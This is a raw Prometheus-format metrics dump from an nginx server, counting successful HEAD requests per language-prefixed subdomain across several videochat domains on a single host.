nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="ee.videochat.mx"} 6 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="ee.videochat.tv.br"} 9 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="ee.videochat.world"} 5 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="el.videochat.cafe"} 6 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="el.videochat.date"} 6 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="el.videochat.mx"} 7 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="el.videochat.tv.br"} 58 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="el.videochat.world"} 12 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="en.videochat.cafe"} 4 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="en.videochat.mx"} 13 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="en.videochat.tv.br"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="eo.videochat.cafe"} 5 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="eo.videochat.date"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="eo.videochat.mx"} 8 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="eo.videochat.tv.br"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="eo.videochat.world"} 60 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="es.videochat.cafe"} 6 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="es.videochat.date"} 9 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="es.videochat.tv.br"} 8 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="es.videochat.world"} 8 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="et.videochat.cafe"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="et.videochat.date"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="et.videochat.mx"} 7 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="et.videochat.tv.br"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="et.videochat.world"} 6 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="eu.videochat.cafe"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="eu.videochat.date"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="eu.videochat.mx"} 10 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="eu.videochat.show"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="eu.videochat.tv.br"} 5 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="eu.videochat.world"} 11 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="fa.videochat.cafe"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="fa.videochat.date"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="fa.videochat.mx"} 14 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="fa.videochat.tv.br"} 136 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="fa.videochat.world"} 31 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="fi.videochat.cafe"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="fi.videochat.date"} 19 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="fi.videochat.mx"} 32 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="fi.videochat.show"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="fi.videochat.tv.br"} 9 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="fi.videochat.world"} 8 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="fr.videochat.date"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="fr.videochat.mx"} 6 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="fr.videochat.tv.br"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="fr.videochat.world"} 9 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="ga.videochat.cafe"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="ga.videochat.date"} 8 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="ga.videochat.mx"} 25 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="ga.videochat.tv.br"} 4 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="ga.videochat.world"} 6 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="gl.videochat.cafe"} 55 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="gl.videochat.date"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="gl.videochat.mx"} 8 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="gl.videochat.tv.br"} 7 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="gl.videochat.world"} 12 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="gu.videochat.cafe"} 6 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="gu.videochat.date"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="gu.videochat.mx"} 8 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="gu.videochat.tv.br"} 5 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="gu.videochat.world"} 10 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="he.videochat.cafe"} 77 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="he.videochat.date"} 9 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="he.videochat.mx"} 8 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="he.videochat.tv.br"} 6 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="he.videochat.world"} 20 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="hi.videochat.cafe"} 5 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="hi.videochat.date"} 10 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="hi.videochat.mx"} 8 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="hi.videochat.tv.br"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="hi.videochat.world"} 6 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="hr.videochat.cafe"} 6 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="hr.videochat.date"} 11 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="hr.videochat.mx"} 8 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="hr.videochat.show"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="hr.videochat.tv.br"} 4 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="hr.videochat.world"} 60 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="ht.videochat.cafe"} 6 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="ht.videochat.date"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="ht.videochat.mx"} 10 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="ht.videochat.tv.br"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="ht.videochat.world"} 10 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="hu.videochat.cafe"} 9 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="hu.videochat.date"} 27 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="hu.videochat.mx"} 11 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="hu.videochat.tv.br"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="hu.videochat.world"} 11 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="id.videochat.cafe"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="id.videochat.date"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="id.videochat.mx"} 7 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="id.videochat.tv.br"} 56 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="id.videochat.world"} 11 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="is.videochat.cafe"} 4 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="is.videochat.date"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="is.videochat.mx"} 7 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="is.videochat.show"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="is.videochat.tv.br"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="is.videochat.world"} 9 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="it.videochat.cafe"} 63 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="it.videochat.date"} 66 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="it.videochat.mx"} 31 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="it.videochat.show"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="it.videochat.tv.br"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="it.videochat.world"} 17 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="jp.videochat.cafe"} 23 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="jp.videochat.date"} 79 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="jp.videochat.mx"} 26 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="jp.videochat.tv.br"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="jp.videochat.world"} 28 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="jv.videochat.cafe"} 8 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="jv.videochat.date"} 8 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="jv.videochat.mx"} 11 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="jv.videochat.tv.br"} 8 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="jv.videochat.world"} 9 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="ka.videochat.cafe"} 8 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="ka.videochat.mx"} 12 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="ka.videochat.tv.br"} 9 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="ka.videochat.world"} 61 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="kk.videochat.cafe"} 12 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="kk.videochat.date"} 6 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="kk.videochat.mx"} 63 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="kk.videochat.tv.br"} 4 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="kk.videochat.world"} 11 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="km.videochat.cafe"} 7 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="km.videochat.mx"} 10 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="km.videochat.tv.br"} 23 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="km.videochat.world"} 10 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="kn.videochat.cafe"} 8 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="kn.videochat.date"} 5 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="kn.videochat.mx"} 8 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="kn.videochat.tv.br"} 8 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="kn.videochat.world"} 16 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="ko.videochat.cafe"} 8 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="ko.videochat.date"} 13 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="ko.videochat.mx"} 9 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="ko.videochat.tv.br"} 6 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="ko.videochat.world"} 12 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="ky.videochat.cafe"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="ky.videochat.date"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="ky.videochat.mx"} 8 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="ky.videochat.tv.br"} 6 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="ky.videochat.world"} 8 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="lb.videochat.cafe"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="lb.videochat.date"} 5 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="lb.videochat.mx"} 8 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="lb.videochat.tv.br"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="lb.videochat.world"} 10 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="lo.videochat.cafe"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="lo.videochat.date"} 4 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="lo.videochat.mx"} 5 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="lo.videochat.tv.br"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="lo.videochat.world"} 6 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="lt.videochat.cafe"} 4 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="lt.videochat.date"} 6 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="lt.videochat.mx"} 56 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="lt.videochat.tv.br"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="lt.videochat.world"} 6 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="lv.videochat.cafe"} 5 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="lv.videochat.date"} 59 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="lv.videochat.mx"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="lv.videochat.tv.br"} 4 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="lv.videochat.world"} 7 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="mg.videochat.cafe"} 7 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="mg.videochat.date"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="mg.videochat.mx"} 9 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="mg.videochat.tv.br"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="mg.videochat.world"} 6 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="mi.videochat.cafe"} 6 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="mi.videochat.date"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="mi.videochat.mx"} 9 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="mi.videochat.tv.br"} 5 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="mi.videochat.world"} 4 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="mk.videochat.cafe"} 5 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="mk.videochat.date"} 7 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="mk.videochat.mx"} 7 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="mk.videochat.tv.br"} 4 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="mk.videochat.world"} 10 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="ml.videochat.cafe"} 4 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="ml.videochat.date"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="ml.videochat.mx"} 80 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="ml.videochat.tv.br"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="ml.videochat.world"} 11 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="mn.videochat.cafe"} 5 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="mn.videochat.date"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="mn.videochat.mx"} 6 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="mn.videochat.tv.br"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="mn.videochat.world"} 5 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="mr.videochat.cafe"} 9 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="mr.videochat.mx"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="mr.videochat.tv.br"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="mr.videochat.world"} 60 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="mrj.videochat.cafe"} 5 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="mrj.videochat.date"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="mrj.videochat.mx"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="mrj.videochat.tv.br"} 4 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="mrj.videochat.world"} 8 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="ms.videochat.cafe"} 4 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="ms.videochat.date"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="ms.videochat.mx"} 7 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="ms.videochat.show"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="ms.videochat.tv.br"} 4 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="ms.videochat.world"} 14 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="mt.videochat.cafe"} 6 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="mt.videochat.date"} 5 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="mt.videochat.mx"} 11 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="mt.videochat.tv.br"} 9 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="mt.videochat.world"} 9 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="my.videochat.cafe"} 6 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="my.videochat.date"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="my.videochat.mx"} 6 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="my.videochat.show"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="my.videochat.tv.br"} 6 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="my.videochat.world"} 57 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="ne.videochat.cafe"} 4 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="ne.videochat.date"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="ne.videochat.mx"} 8 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="ne.videochat.tv.br"} 8 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="ne.videochat.world"} 5 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="nl.videochat.cafe"} 5 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="nl.videochat.date"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="nl.videochat.mx"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="nl.videochat.show"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="nl.videochat.tv.br"} 54 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="nl.videochat.world"} 8 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="no.videochat.cafe"} 105 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="no.videochat.date"} 8 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="no.videochat.mx"} 8 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="no.videochat.tv.br"} 54 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="no.videochat.world"} 9 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="pa.videochat.cafe"} 6 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="pa.videochat.date"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="pa.videochat.mx"} 8 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="pa.videochat.tv.br"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="pa.videochat.world"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="pap.videochat.cafe"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="pap.videochat.date"} 4 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="pap.videochat.mx"} 5 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="pap.videochat.show"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="pap.videochat.tv.br"} 5 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="pap.videochat.world"} 5 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="pl.videochat.cafe"} 9 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="pl.videochat.date"} 10 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="pl.videochat.mx"} 9 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="pl.videochat.tv.br"} 53 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="pl.videochat.world"} 11 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="pt.videochat.cafe"} 62 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="pt.videochat.date"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="pt.videochat.mx"} 58 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="pt.videochat.world"} 66 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="ro.videochat.cafe"} 4 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="ro.videochat.date"} 12 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="ro.videochat.mx"} 9 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="ro.videochat.tv.br"} 55 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="ro.videochat.world"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="sco.videochat.cafe"} 4 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="sco.videochat.mx"} 12 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="sco.videochat.tv.br"} 10 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="sco.videochat.world"} 19 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="si.videochat.cafe"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="si.videochat.date"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="si.videochat.mx"} 6 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="si.videochat.tv.br"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="si.videochat.world"} 8 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="sk.videochat.cafe"} 5 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="sk.videochat.date"} 10 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="sk.videochat.mx"} 35 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="sk.videochat.tv.br"} 53 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="sk.videochat.world"} 9 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="sl.videochat.cafe"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="sl.videochat.date"} 14 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="sl.videochat.mx"} 5 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="sl.videochat.tv.br"} 4 